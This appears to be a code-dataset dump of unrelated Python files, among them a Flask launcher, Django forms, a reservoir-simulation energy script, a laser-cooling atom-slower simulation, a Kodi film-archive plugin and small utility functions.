text stringlengths 8 6.05M |
|---|
from blog import create_app
if __name__ == '__main__':
# app.run(debug=True)
app=create_app()
app.run(host="0.0.0.0", port=80,debug=True) |
import os
# {{product_name:浙江在线杭州}}
# if __name__ == '__main__':
# path = './data.txt'
# save_path = './spu_name_origindata.txt'
def clear_and_format_data1(data_name, save_path):
"""
原数据格式为:
商品名 标签
舒洁双层抽取纸4包装 纸
舒洁精品3层卷筒卫生纸260节*10 卫生纸
舒洁无香湿巾单包装10片 纸
清风原木纯品面纸3包装 面纸
舒洁迪斯尼软抽3包装 软抽
Frosch芦荟洗衣液(瓶装)1500ml 洗衣液
"""
f = open(data_name, 'r', encoding='utf-8')
data_ = f.readlines()
f.close()
f_save = open(os.path.join(save_path, 'spu_name_origindata.txt'), 'w', encoding='utf-8')
for line in data_:
each_data = line.replace('\n', '').replace(' ', '').replace('{', '').replace('}', '').split('\t')
print(each_data)
if len(each_data) == 2 and each_data[1] in each_data[0]:
str_temp = each_data[0].replace(each_data[1], '{{spu_name:%s}}' % each_data[1])
f_save.write(str_temp + '\n')
print(str_temp)
else:
f_save.write(each_data[0] + '\n')
def clear_and_format_data2(data_name, save_path):
"""
原数据格式为:
商品名 二级类别 标签
舒洁双层抽取纸4包装 xxxx 纸
舒洁精品3层卷筒卫生纸260节*10 xxxx 卫生纸
舒洁无香湿巾单包装10片 xxxx 纸
清风原木纯品面纸3包装 xxxx 面纸
舒洁迪斯尼软抽3包装 xxxx 软抽
Frosch芦荟洗衣液(瓶装)1500ml xxxx 洗衣液
"""
f = open(data_name, 'r', encoding='utf-8')
data_ = f.readlines()
f.close()
f_save = open(os.path.join(save_path, 'spu_name_origindata.txt'), 'w', encoding='utf-8')
for line in data_:
each_data = line.replace('\n', '').replace(' ', '').replace('{', '').replace('}', '').split('\t')
# print(each_data)
if len(each_data) == 3 and each_data[2] in ','.join(each_data[:2]):
str_temp = ','.join(each_data[:2]).replace(each_data[2], '{{spu_name:%s}}' % each_data[2])
f_save.write(str_temp + '\n')
# print(str_temp)
elif len(each_data) == 2 and each_data[1] in each_data[0]:
str_temp = each_data[0].replace(each_data[1], '{{spu_name:%s}}' % each_data[1])
f_save.write(str_temp + '\n')
# print(str_temp)
else:
f_save.write(each_data[0] + '\n')
|
from django.contrib.auth import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django.forms import ModelForm
from django import forms
from users.models import CustomUser
from .models import NomeraKlassa
from .models import Predmety
from .models import Prepodavately
from .models import Uroki, NomeraUroka, NomeraKlassa, Predmety, Prepodavately
class UserCreateForm(UserCreationForm):
klass_nomer = forms.IntegerField(required=True)
class Meta:
model = CustomUser
fields = ( "password1", "password2", "klass", "email")
def save(self, commit=True):
user = super(UserCreateForm, self).save(commit=False)
user.klass_nomer = self.cleaned_data["klass_nomer"]
if commit:
user.save()
return user
class UrokiForm(ModelForm):
class Meta:
model = Uroki
fields = ['date_field', 'nomer_uroka', 'nomer_klassa', 'vremya_nachala_uroka', 'nazvanie_predmeta', 'prepodavatel', 'tema_uroka', 'ssylka_na_urok', 'kod_dostupa', 'kommentaryi']
|
import rips
import time
import grpc
import math
from operator import itemgetter
from ecl.eclfile import EclFile
from ecl.grid import EclGrid
# Connect to ResInsight
resinsight = rips.Instance.find()
start = time.time()
case = resinsight.project.cases()[0]
num_tsteps = len(case.time_steps())
name = case.name
grids = case.grids()
for grid in grids:
dimension = grid.dimensions()
Nx = dimension.i
Ny = dimension.j
Nz = dimension.k
# Read output files
egrid_file = EclFile("%s.EGRID" % name)
init_file = EclFile("%s.INIT" % name)
egrid = EclGrid("%s.EGRID" % name)
# Read ACTNUM numbers from EGRID file
actnum = egrid_file["ACTNUM"][0]
active_cells = []
for i in range(len(actnum)):
if actnum[i] == 1:
active_cells.append(i+1)
num_active_cells = len(active_cells)
# Read NNC pairs from EGRID and INIT file
nnc_list = []
if egrid_file.has_kw("NNC1"):
nnc1 = egrid_file["NNC1"][0]
nnc2 = egrid_file["NNC2"][0]
tran = init_file["TRANNNC"][0]
for g1,g2,t in zip(nnc1,nnc2,tran):
nnc_list.append((g1,g2,t))
# Calculation of energy dissipation for each cell
total_ed = 0.0
for tstep in range(219,num_tsteps):
print("Timestep", tstep, "of", num_tsteps)
# Read results into list
tranx_results = case.active_cell_property('STATIC_NATIVE', 'TRANX', 0)
trany_results = case.active_cell_property('STATIC_NATIVE', 'TRANY', 0)
tranz_results = case.active_cell_property('STATIC_NATIVE', 'TRANZ', 0)
multx_results = case.active_cell_property('STATIC_NATIVE', 'MULTX', 0)
multy_results = case.active_cell_property('STATIC_NATIVE', 'MULTY', 0)
multz_results = case.active_cell_property('STATIC_NATIVE', 'MULTZ', 0)
pres_results = case.active_cell_property('DYNAMIC_NATIVE', 'PRESSURE', tstep)
krw_results = case.active_cell_property('DYNAMIC_NATIVE', 'WATKR', tstep)
kro_results = case.active_cell_property('DYNAMIC_NATIVE', 'OILKR', tstep)
krg_results = case.active_cell_property('DYNAMIC_NATIVE', 'GASKR', tstep)
muw_results = case.active_cell_property('DYNAMIC_NATIVE', 'WAT_VISC', tstep)
muo_results = case.active_cell_property('DYNAMIC_NATIVE', 'OIL_VISC', tstep)
mug_results = case.active_cell_property('DYNAMIC_NATIVE', 'GAS_VISC', tstep)
# Determination of upstream/downstream cells in each direction
prevx_pres_results = [0.0] * num_active_cells
nextx_pres_results = [0.0] * num_active_cells
prevy_pres_results = [0.0] * num_active_cells
nexty_pres_results = [0.0] * num_active_cells
prevz_pres_results = [0.0] * num_active_cells
nextz_pres_results = [0.0] * num_active_cells
for c in range(num_active_cells):
print("pres calculation: checking cell", c+1, "of", num_active_cells, end="\r")
idx = active_cells[c]
plane_num = idx%(Nx*Ny)
layer_num = math.floor(idx/(Nx*Ny))
if idx-1 in active_cells and idx%Nx != 0:
prevx_pres_results[c] = pres_results[active_cells.index(idx-1)]
if idx+1 in active_cells and (idx+1)%Nx != 0:
nextx_pres_results[c] = pres_results[active_cells.index(idx+1)]
if idx-Nx in active_cells:
prevy_pres_results[c] = pres_results[active_cells.index(idx-Nx)]
if plane_num < Nx:
prevy_pres_results[c] = 0.0
if idx+Nx in active_cells:
nexty_pres_results[c] = pres_results[active_cells.index(idx+Nx)]
if plane_num+Nx >= (Nx*Ny):
nexty_pres_results[c] = 0.0
if idx-(Nx*Ny) in active_cells:
prevz_pres_results[c] = pres_results[active_cells.index(idx-Nx*Ny)]
if layer_num == 0:
prevz_pres_results[c] = 0.0
if idx+(Nx*Ny) in active_cells:
nextz_pres_results[c] = pres_results[active_cells.index(idx+Nx*Ny)]
if layer_num == Nz-1:
nextz_pres_results[c] = 0.0
print(end='\r')
# Calculate interblock flowrates in + direction(s)
flow_x_results = []
flow_y_results = []
flow_z_results = []
zip_results_f = list(zip(tranx_results, trany_results, tranz_results, multx_results, multy_results, multz_results, pres_results, prevx_pres_results, nextx_pres_results, prevy_pres_results, nexty_pres_results, prevz_pres_results, nextz_pres_results, krw_results, kro_results, krg_results, muw_results, muo_results, mug_results))
for (tranx, trany, tranz, multx, multy, multz, pres, prevx_pres, nextx_pres, prevy_pres, nexty_pres, prevz_pres, nextz_pres, krw, kro, krg, muw, muo, mug) in zip_results_f:
if nextx_pres > 0.0 and tranx > 0.0:
flow_x = tranx * multx * ((krw/muw)+(kro/muo)+(krg/mug)) * (pres-nextx_pres)
else:
flow_x = 0.0
if nexty_pres > 0.0 and trany > 0.0:
flow_y = trany * multy * ((krw/muw)+(kro/muo)+(krg/mug)) * (pres-nexty_pres)
else:
flow_y = 0.0
if nextz_pres > 0.0 and tranz > 0.0:
flow_z = tranz * multz * ((krw/muw)+(kro/muo)+(krg/mug)) * (pres-nextz_pres)
else:
flow_z = 0.0
flow_x_results.append(flow_x)
flow_y_results.append(flow_y)
flow_z_results.append(flow_z)
# Determination of downstream flowrates in each direction
prevx_flow_results = [0.0] * num_active_cells
prevy_flow_results = [0.0] * num_active_cells
prevz_flow_results = [0.0] * num_active_cells
for c in range(num_active_cells):
print("flow calculation: checking cell", c+1, "of", num_active_cells, end="\r")
idx = active_cells[c]
plane_num = idx%(Nx*Ny)
layer_num = math.floor(idx/(Nx*Ny))
if idx-1 in active_cells and idx%Nx != 0:
prevx_flow_results[c] = flow_x_results[active_cells.index(idx-1)]
if idx-Nx in active_cells:
prevy_flow_results[c] = flow_y_results[active_cells.index(idx-Nx)]
if plane_num < Nx:
prevy_flow_results[c] = 0.0
if idx-(Nx*Ny) in active_cells:
prevz_flow_results[c] = flow_z_results[active_cells.index(idx-Nx*Ny)]
if layer_num == 0:
prevz_flow_results[c] = 0.0
print(end='\r')
# Generate energy change lists as results
e_dis = []
e_int = []
# 1: Calculate energy changes in reservoir
zip_results_e = list(zip(pres_results, prevx_pres_results, nextx_pres_results, prevy_pres_results, nexty_pres_results, prevz_pres_results, nextz_pres_results, flow_x_results, flow_y_results, flow_z_results, prevx_flow_results, prevy_flow_results, prevz_flow_results))
for (pres, prevx_pres, nextx_pres, prevy_pres, nexty_pres, prevz_pres, nextz_pres, flow_x, flow_y, flow_z, prevx_flow, prevy_flow, prevz_flow) in zip_results_e:
ed_x = flow_x * (pres - nextx_pres)
ed_y = flow_y * (pres - nexty_pres)
ed_z = flow_z * (pres - nextz_pres)
ei_x = pres * (prevx_flow - flow_x)
ei_y = pres * (prevy_flow - flow_y)
ei_z = pres * (prevz_flow - flow_z)
e_dis.append((ed_x + ed_y + ed_z) * (1e5/86400)) # Convert unit to J/s
e_int.append((ei_x + ei_y + ei_z) * (1e5/86400))
#2: Calculate energy changes from flow between NNC pairs
for n in range(len(nnc_list)):
print("Checking NNC", n+1, "of", len(nnc_list), end="\r")
orig = active_cells.index(nnc_list[n][0])
dest = active_cells.index(nnc_list[n][1])
param1 = zip_results_f[orig]
param2 = zip_results_f[dest]
tran = nnc_list[n][2]
flow_nnc = tran * ((param1[13]/param1[16])+(param1[14]/param1[17])+(param1[15]/param1[18])) * (param1[6]-param2[6])
ed_nnc = flow_nnc * (param1[6]-param2[6]) * (1e5/86400)
ei_nnc_1 = -param1[6] * flow_nnc * (1e5/86400)
ei_nnc_2 = param2[6] * flow_nnc * (1e5/86400)
e_dis[orig] += ed_nnc
e_int[orig] += ei_nnc_1
e_int[dest] += ei_nnc_2
print("Total energy dissipation:",sum(e_dis),"J/s")
print("Total internal energy change:",sum(e_int),"J/s")
try:
# Send back output result
case.set_active_cell_property(e_dis, 'GENERATED', 'Energy Dissipation', tstep)
case.set_active_cell_property(e_int, 'GENERATED', 'Internal Energy Change', tstep)
except grpc.RpcError as e:
print("Exception Received: ", e)
end = time.time()
print("Time elapsed: ", end - start)
print("Transferred all results back\n")
view = case.views()[0].apply_cell_result('GENERATED', 'Energy Dissipation') |
import dash_bootstrap_components as dbc
from dash import html
dropdown = dbc.DropdownMenu(
[
dbc.DropdownMenuItem("Header", header=True),
dbc.DropdownMenuItem("An item"),
dbc.DropdownMenuItem(divider=True),
dbc.DropdownMenuItem("Active and disabled", header=True),
dbc.DropdownMenuItem("Active item", active=True),
dbc.DropdownMenuItem("Disabled item", disabled=True),
dbc.DropdownMenuItem(divider=True),
html.P(
"You can have other content here like text if you like.",
className="text-muted px-4 mt-4",
),
],
label="Menu",
)
|
import numpy as np
import scipy.stats as sts
import matplotlib.pyplot as plt
import scipy.constants as sc
import scipy.special as scp
import timeit
start = timeit.default_timer()
G = 38.11e6 # See ln 96
E0 = 150
Da = 4.0*G # Original detuning
d = 0.3*G # Increment of Detuning
aa = 0.15 # Coil Radius
s = 0.11 # Coil Separation
Curr = 0.6805 # Current (16G/cm @ 0.6805)
z0 = 0.24 # Position of MOT centre
h = 0.00005 #Step Size
Natoms = 20
Nsteps = 200
Db,Dc,Dd,De,Df,Dg = Da+d, Da+2*d, Da+3*d, Da+4*d, Da+5*d, Da+6*d
xx = np.linspace(0.000001, 1, 100)
def Jgen(T,n,M):
''' Maxwell-Boltzmann Distrb. '''
T = 273+20
MB=sts.maxwell
kb=1.38e-23
a=abs(np.sqrt((kb*T)/(M)))
vt=MB.rvs(loc=0, scale=a, size=n, random_state=None)
return vt
Vn = 50
Vx = 320
def vgen(n):
''' Linear Velocity Distrb. '''
lin = np.linspace(Vn,Vx,n)
return lin
def zgen(n):
''' Linear Coordinate Distrb. '''
lin = np.linspace(0,0,n)
return lin
def MagLeak(z, z0, Curr):
'''Mag Field from AntiHlmHltz coils (of center z0 [ >0 ]) that leaks into our slower'''
x = s/2
ZZ = -z+z0
zz = -ZZ
A,B = ZZ/aa, x/aa
Q = B**2+(1+A)**2
k = (4*A/Q)**0.5
B0 = Curr*sc.mu_0/(2*aa)
K = scp.ellipk(k**2)
E = scp.ellipe(k**2)
Br = 2*B0*(x/ZZ)/(np.pi*Q**0.5)*(E*(1+A**2+B**2)/(Q-4*A)-K)
Bro = np.nan_to_num(Br)
#'''''
A_ = zz/aa
Q_ = B**2+(1+A_)**2
k_ = (4*A_/Q_)**0.5
K_ = scp.ellipk(k_**2)
E_ = scp.ellipe(k_**2)
Br_ = -2*B0*(x/zz)/(np.pi*Q_**0.5)*(E_*(1+A_**2+B**2)/(Q_-4*A_)-K_)
Br_o = np.nan_to_num(Br_)
return Br_o + Bro
def RK4step(ti,zi,vi,h,dv,dz):
k11=dz(ti,zi,vi)
k21=dv(ti,zi,vi)
k12=dz(ti+h/2,zi +(h/2)*k11,vi +(h/2)*k21)
k22=dv(ti+h/2,zi +(h/2)*k11,vi +(h/2)*k21)
k13=dz(ti+h/2,zi +(h/2)*k12,vi +(h/2)*k22)
k23=dv(ti+h/2,zi +(h/2)*k12,vi +(h/2)*k22)
k14=dz(ti+h,zi +(h)*k13,vi +(h)*k23)
k24=dv(ti+h,zi +(h)*k13,vi +(h)*k23)
z1=zi+(h/6.0)*(k11+2.0*k12+2.0*k13+k14)
v1=vi+(h/6.0)*(k21+2.0*k22+2.0*k23+k24)
zi = z1
vi = v1
return zi,vi
""" Physical & Atomic Constants """
kb = sc.Boltzmann # Boltzmann Constant
mu0 = sc.mu_0 # Vacc Permtivity
muB = 9.2740099*10**-24 # Borh Magnetron
u = sc.proton_mass # Proton Mass
hbar = sc.hbar # hbar
c = sc.c # speed of light
pi = np.pi # pi
M = 87*u # Mass of 87Rb
wab = 2*pi*384.23e12 # Freq of transation
#G = 38.11e6 # Gamma / Rate of SpE
dip = 3.485e-29 # dipole moment
''' Variable Dance '''
Rabi = dip*E0/hbar # Rabi Frequency
IoIs = 2*Rabi**2/G**2 # Intensity / Saturation Intensity
IrE = c*8.85e-12/2*E0**2/10000 # Intensity (This /10000 makes it W/cm^2)
w = wab - Dd # Average Freq of colliding photon
Lambda = 2*pi*c/w # Avg Wavelength
k = 2*pi/Lambda # Average wavenumber of a momentum transfering photon
def dv(t,z,v):
" The 'complete' Force Equation for a 7 freq 1 dimensional slower inc. magnetic field "
w_a = wab - Da
w_b = wab - Db
w_c = wab - Dc
w_d = wab - Dd
w_e = wab - De
w_f = wab - Df
w_g = wab - Dg
Oa = w_a/(2*pi*c)-muB*MagLeak(z, z0, Curr)/hbar
Ob = w_b/(2*pi*c)-muB*MagLeak(z, z0, Curr)/hbar
Oc = w_c/(2*pi*c)-muB*MagLeak(z, z0, Curr)/hbar
Od = w_d/(2*pi*c)-muB*MagLeak(z, z0, Curr)/hbar
Oe = w_e/(2*pi*c)-muB*MagLeak(z, z0, Curr)/hbar
Of = w_f/(2*pi*c)-muB*MagLeak(z, z0, Curr)/hbar
Og = w_g/(2*pi*c)-muB*MagLeak(z, z0, Curr)/hbar
c1a = 1+IoIs+4*Da**2/G**2
c2a = Oa*8*Da/G**2
c1b = 1+IoIs+4*Db**2/G**2
c2b = Ob*8*Db/G**2
c1c = 1+IoIs+4*Dc**2/G**2
c2c = Oc*8*Dc/G**2
c1d = 1+IoIs+4*Dd**2/G**2
c2d = Od*8*Dd/G**2
c1e = 1+IoIs+4*De**2/G**2
c2e = Oe*8*De/G**2
c1f = 1+IoIs+4*Df**2/G**2
c2f = Of*8*Df/G**2
c1g = 1+IoIs+4*Dg**2/G**2
c2g = Og*8*Dg/G**2
c3a = 4*Oa**2/G**2
c3b = 4*Ob**2/G**2
c3c = 4*Oc**2/G**2
c3d = 4*Od**2/G**2
c3e = 4*Oe**2/G**2
c3f = 4*Of**2/G**2
c3g = 4*Og**2/G**2
rhoaa = -(IoIs/2)*(1/(c1a-c2a*v+c3a*v**2)+1/(c1b-c2b*v+c3b*v**2)+1/(c1c-c2c*v+c3c*v**2)+1/(c1d-c2d*v+c3d*v**2)+1/(c1e-c2e*v+c3e*v**2)+1/(c1f-c2f*v+c3f*v**2)+1/(c1g-c2g*v+c3g*v**2))
rhoaaB = (IoIs/2)*(1/(c1a+c2a*v+c3a*v**2)+1/(c1b+c2b*v+c3b*v**2))#+1/(c1c+c2c*v+c3c*v**2)+1/(c1d+c2d*v+c3d*v**2)+1/(c1e+c2e*v+c3e*v**2)+1/(c1f+c2f*v+c3f*v**2)+1/(c1g+c2g*v+c3g*v**2))
return (rhoaa+rhoaaB)*hbar*k*G/M
def dz(t,z,v):
return v
plt.close('all')
fig = plt.figure()
ax1 = plt.subplot2grid((4,3), (0,0), rowspan=2)
ax2 = plt.subplot2grid((4,3), (2,0), rowspan=2, sharex=ax1)
ax3 = plt.subplot2grid((4,3), (0,1), rowspan=3, colspan=2)
ax4 = plt.subplot2grid((4,3), (3,1), rowspan=1, colspan=2, sharex=ax3)
"""creation of our array of velocities"""
#vlin=Jgen(T,Natoms,M)
vlin=vgen(Natoms)
zlin=zgen(Natoms)
zs,vs,ts=[],[],[]
"""this loop goes through all the atoms we've got and applies the force dv to them for a number of steps, Nsteps"""
for j in range(Natoms):
vi = vlin[j]
zi = zlin[j]
for i in range(Nsteps):
ti=h*i
zs.append(zi)
vs.append(vi)
ts.append(ti)
z1=RK4step(ti,zi,vi,h,dv,dz)[0]
v1=RK4step(ti,zi,vi,h,dv,dz)[1]
zi = z1
vi = v1
V = np.reshape(vs, (Natoms,Nsteps))
Z = np.reshape(zs, (Natoms,Nsteps))
tt = np.array(ts)
thet = np.split(tt, Natoms)[1]
for i in range(Natoms):
'A plot for each of the Natoms particles'
th = 0.35
col = (float(i/(Natoms+1)+0.0001), np.square(1-float(i/(Natoms+1)+0.0001)), np.sqrt(1-float(i/(Natoms+1)+0.0001)))
ax1.plot(thet,V[i],linewidth=th, color = col)
ax2.plot(thet,Z[i],linewidth=th, color = col)
ax3.plot(Z[i],V[i],linewidth=th, color = col)
capV, capv = 50,15
ax1.axhspan(-capV,capV, alpha=0.05, color='b')
ax1.axhspan(-capv,capv, alpha=0.05, color='red')
ax1.set_ylim(top=Vx+5, bottom=-capV)
ax1.set_xlim(left=0, right=0.003)
ax2.hlines(z0, 0, h*Nsteps, linestyles='dashed')
ax2.hlines(z0-aa, 0, h*Nsteps, linestyles='dotted')
ax2.set_xlim(left=0, right=0.003)
ax2.set_ylim(top=2*aa, bottom=-0.005)
ax3.axhspan(-capV,capV, alpha=0.05, color='b')
ax3.axhspan(-capv,capv, alpha=0.05, color='red')
ax3.axvline(x = z0 - aa, color = 'k', linestyle='dotted')
ax3.axvline(x = z0, color = 'k', linestyle='dashed')
ax3.set_xlim(left=-0.009, right=z0+1.1*aa)
ax3.set_ylim(top=Vx+2, bottom=-30)
ax4.axvline(x = z0 - aa, color = 'k', linestyle='dotted')
ax4.axvline(x = z0, color = 'k', linestyle='dashed')
ax4.fill_between(xx, 0, MagLeak(xx, z0, Curr)*1000, color='k', alpha=0.1)
ax4.plot(xx, MagLeak(xx, z0, Curr)*1000, color='gray')
fig.subplots_adjust(hspace=0) # Makes the plots that share the
# # same x axis on top of each other
ax1.set_ylabel("Velocity / ms`'", size = 13)
ax2.set_ylabel('Coordinate / m', size = 13)
ax2.set_xlabel('Time / s', size = 13)
ax3.set_ylabel("Velocity / ms`'", size = 15)
#ax3.set_title('Multi-Frequency Slowing Simulation: $\it{7}$ $\it{Frequencies}$, $\it{MOT}$ $\it{Magnetic}$ $\it{Field}$', size=17)
ax3.set_title('Multi-Frequency Slowing Simulation: 7 Frequencies, with some backwards and MOT Magnetic Field', size=17)
ax4.set_xlabel('Distance / m (0 = atom source)', size = 20)
ax4.set_ylabel('Magnetic Field Strength / mT')
'''Slope Finding'''
LenLin,dd = 1000, 0.03
LinGrad = np.linspace(z0-dd, z0+dd, LenLin)
Bp = MagLeak(LinGrad,z0,Curr)[0]
Bm = MagLeak(LinGrad,z0,Curr)[LenLin-1]
ax4.plot(LinGrad, MagLeak(LinGrad, z0, Curr)*1000, color='cyan', lw=0.5)
Grad = abs(Bp-Bm)/(2*dd)
from datetime import date
today = date.today()
d4 = today.strftime("%d-%b-%Y")
#print("d4 =", d4)
#ax3.legend(title=' {}\nIntensity = {}W/cm2\nDetuning = {} w/ Increment {}MHz\nE0 = {} no. atoms = {} \nLength of Tube = {}cm\nMag Field Gradient = {}G/cm'.format(d4,round(IrE, 3),Da/1000000,d/1000000,E0,nj, round((z0-aa)*100,3),round(Grad*1000000,2), loc=2, prop={'size': 18}))
textstr = ' {}\nIntensity = {}mW/cm2\nDetuning = {} w/ Increment {}MHz\nE0 = {} no. atoms = {} \nLength of Tube = {}cm\nMag Field Gradient = {}G/cm'.format(d4,round(IrE*1000, 3),Da/1000000,d/1000000,E0,Natoms, round((z0-aa)*100,3),round(Grad*1000000,2))
ax3.text(z0+0.01, 250, textstr, fontsize=16)
stop = timeit.default_timer()
print('# Particles = {}'.format(Natoms))
print('Beam Intensity = {}W/cm^2'.format(round(IrE, 3)))
print('Run Time =',round(stop - start, 3),'sec')
plt.show()
|
a=input("Write a: ")
are=(int(a)**2)
print("Are S :")
print(are) |
# -*- coding: utf-8 -*-
"""Main plugin file - Handles the various routes"""
__author__ = "fraser"
import logging
import routing
import xbmc
import xbmcaddon
import xbmcplugin
from xbmcgui import ListItem
from resources.lib import kodilogging
from resources.lib import kodiutils as ku
from resources.lib import search as nfpfs
kodilogging.config()
logger = logging.getLogger(__name__)
plugin = routing.Plugin()
ADDON_NAME = xbmcaddon.Addon().getAddonInfo("name") # National Film Preservation
def parse_search_results(json, query):
# type: (dict, str) -> None
"""Parses search results"""
for video in json.get("videos"):
for key in video:
item = video.get(key)
if not item:
continue
elif isinstance(item, list):
item = " ".join(item)
elif isinstance(item, int):
item = str(item)
if query in item: # simple text search on each field
add_menu_item(play_film,
video.get("name"),
args={"href": video.get("path")},
art=ku.art(nfpfs.get_url(video.get("image_path"))),
info={
"mediatype": "video",
"plot": nfpfs.text_to_soup(video.get("notes")).find("p").text,
"genre": video.get("archive_names"),
"year": video.get("sort_year")
},
directory=False)
break # only one match per-video
def paginate(category, href, page):
# type: (str, str, int) -> None
"""Adds pagination to results pages"""
next_page = page + 1
add_menu_item(section,
"[{} {}]".format(ku.localize(32011), next_page),
args={
"href": href,
"page": next_page,
"offset": page * nfpfs.SEARCH_MAX_RESULTS,
"category": category
})
def add_menu_item(method, label, **kwargs):
# type: (callable, Union[str, int], Any) -> None
"""wrapper for xbmcplugin.addDirectoryItem"""
args = kwargs.get("args", {})
label = ku.localize(label) if isinstance(label, int) else label
list_item = ListItem(label)
list_item.setArt(kwargs.get("art"))
if method == search and "q" in args:
list_item.addContextMenuItems([(
ku.localize(32019),
"XBMC.RunPlugin({})".format(plugin.url_for(search, delete=True, q=label))
)])
if method == section or method == play_film:
list_item.setInfo("video", kwargs.get("info"))
if method == play_film:
list_item.setProperty("IsPlayable", "true")
xbmcplugin.addDirectoryItem(
plugin.handle,
plugin.url_for(method, **args),
list_item,
kwargs.get("directory", True))
def get_arg(key, default=None):
# type: (str, Any) -> Any
"""Get the argument value or default"""
if default is None:
default = ""
return plugin.args.get(key, [default])[0]
def parse_mercury(soup):
# type: (BeautifulSoup) -> None
"""Parses the mercury theater items (odd mark-up)"""
for image in soup.select("a > img"):
action = image.find_previous("a")
parts = soup.select("a[href={}]".format(action.get("href")))
add_menu_item(play_film,
parts[1].text.strip(),
args={"href": action.get("href")},
art=ku.art(nfpfs.get_url(image.get("src"))),
info={"plot": soup.find("h3").find_next("p").text},
directory=False)
@plugin.route("/")
def index():
# type: () -> None
"""Main menu"""
add_menu_item(section, "Collections", art=ku.icon("collection.png"))
if ku.get_setting_as_bool("show_recent"):
add_menu_item(recent, 32005, art=ku.icon("recent.png"))
if ku.get_setting_as_bool("show_search"):
add_menu_item(search, 32007, args={"menu": True},
art=ku.icon("search.png"))
if ku.get_setting_as_bool("show_settings"):
add_menu_item(settings, 32010, art=ku.icon("settings.png"), directory=False)
xbmcplugin.setPluginCategory(plugin.handle, ADDON_NAME)
xbmcplugin.endOfDirectory(plugin.handle)
@plugin.route("/section")
def section():
# type: () -> None
"""Show category menu and category playable items"""
href = get_arg("href")
category = get_arg("category", ku.localize(32002))
page = int(get_arg("page", 1))
offset = int(get_arg("offset", 0))
if not href:
# section menu
soup = nfpfs.get_html(nfpfs.NFPF_SCREENING_ROOM_URI)
for item in soup.find_all("table"):
title = item.find("h5").text
add_menu_item(section, title,
args={"href": item.find("a").get("href"), "category": title},
art=ku.art(nfpfs.get_url(item.find("img").get("src"))),
info={"plot": item.find("p").text})
else:
url = nfpfs.get_url(href)
soup = nfpfs.get_html(url)
if url == nfpfs.NFPF_MERCURY_URI:
# odd playable items
parse_mercury(soup)
else:
results = soup.find_all("figure", "video-thumb")
items = results[offset:nfpfs.SEARCH_MAX_RESULTS + offset]
# section paging
if len(results) > len(items) == nfpfs.SEARCH_MAX_RESULTS:
paginate(category, href, page)
for item in items:
# section playable items
action = item.find("figcaption").find("a")
url = nfpfs.get_url(action.get("href"))
data = nfpfs.get_info(nfpfs.get_html(url))
data.get("info")["genre"] = item.get("data-archive")
add_menu_item(play_film,
data.get("title"),
args={"href": url},
art=ku.art(data.get("image")),
info=data.get("info"),
directory=False)
xbmcplugin.setContent(plugin.handle, "videos")
xbmcplugin.addSortMethod(plugin.handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
xbmcplugin.addSortMethod(plugin.handle, xbmcplugin.SORT_METHOD_VIDEO_YEAR)
xbmcplugin.addSortMethod(plugin.handle, xbmcplugin.SORT_METHOD_GENRE)
xbmcplugin.setPluginCategory(plugin.handle, category)
xbmcplugin.endOfDirectory(plugin.handle)
@plugin.route("/recent")
def recent():
# type: () -> None
"""Show recently viewed films"""
data = nfpfs.recents.retrieve()
for url in data:
soup = nfpfs.get_html(url)
info = nfpfs.get_info(soup)
add_menu_item(play_film,
info.get("title"),
args={"href": url},
art=ku.art(info.get("image")),
info=info.get("info"),
directory=False)
xbmcplugin.addSortMethod(plugin.handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
xbmcplugin.addSortMethod(plugin.handle, xbmcplugin.SORT_METHOD_VIDEO_YEAR)
xbmcplugin.addSortMethod(plugin.handle, xbmcplugin.SORT_METHOD_GENRE)
xbmcplugin.setPluginCategory(plugin.handle, ku.localize(32005)) # Recent
xbmcplugin.setContent(plugin.handle, "videos")
xbmcplugin.endOfDirectory(plugin.handle)
@plugin.route("/settings")
def settings():
# type: () -> None
"""Addon Settings"""
ku.show_settings()
xbmc.executebuiltin("Container.Refresh()")
@plugin.route("/play")
def play_film():
# type: () -> None
"""Show playable item"""
href = get_arg("href")
url = nfpfs.get_url(href)
soup = nfpfs.get_html(url)
data = nfpfs.get_info(soup)
if not data.get("video"):
logger.debug("play_film error: {}".format(href))
return
if nfpfs.RECENT_SAVED:
nfpfs.recents.append(url)
list_item = ListItem(path=data.get("video"))
list_item.setInfo("video", data.get("info"))
xbmcplugin.setResolvedUrl(plugin.handle, True, list_item)
@plugin.route("/clear/<idx>")
def clear(idx):
# type: (str) -> None
"""Clear cached or recently played items"""
if idx == "cache" and ku.confirm():
nfpfs.cache_clear()
if idx == "recent" and ku.confirm():
nfpfs.recents.clear()
if idx == "search" and ku.confirm():
nfpfs.searches.clear()
@plugin.route("/search")
def search():
# type: () -> Optional[bool]
"""Search the archive"""
query = get_arg("q")
category = get_arg("category", ku.localize(32007)) # Search
# Remove saved search item
if bool(get_arg("delete", False)):
nfpfs.searches.remove(query)
xbmc.executebuiltin("Container.Refresh()")
return True
# View saved search menu
if bool(get_arg("menu", False)):
add_menu_item(search, "[{}]".format(ku.localize(32016)), args={"new": True}) # [New Search]
for item in nfpfs.searches.retrieve():
text = item.encode("utf-8")
add_menu_item(search, text, args={"q": text, "category": "{} '{}'".format(ku.localize(32007), text)})
xbmcplugin.setPluginCategory(plugin.handle, category)
xbmcplugin.endOfDirectory(plugin.handle)
return True
# New look-up
if bool(get_arg("new", False)):
query = ku.user_input()
if not query:
return False
category = "{} '{}'".format(ku.localize(32007), query)
if nfpfs.SEARCH_SAVED:
nfpfs.searches.append(query)
# Process search
parse_search_results(nfpfs.get_json(nfpfs.NFPF_VIDEOS_URI), query)
xbmcplugin.addSortMethod(plugin.handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
xbmcplugin.addSortMethod(plugin.handle, xbmcplugin.SORT_METHOD_VIDEO_YEAR)
xbmcplugin.addSortMethod(plugin.handle, xbmcplugin.SORT_METHOD_GENRE)
xbmcplugin.setPluginCategory(plugin.handle, category)
xbmcplugin.endOfDirectory(plugin.handle)
def run():
# type: () -> None
"""Main entry point"""
plugin.run()
|
from math import *
def degre(P):
for i in range(len(P)-1, 0, -1):
if P[i] != 0:
return i
return 0
#print(degre([0,1,2,3,0,5,9,0]))
#print(degre([0]))
#print(degre([0,0,0]))
#print(degre([0,1]))
#print(degre([0,1,2,3,0,5,0,0]))
def reduc(P):
c = len(P)-1
r = False
while (c >= 1 and r == False):
if P[c] == 0:
P.pop(c)
else:
r = True
c-=1
return P
#print(reduc([0,1,2,3,0,5,0,0]))
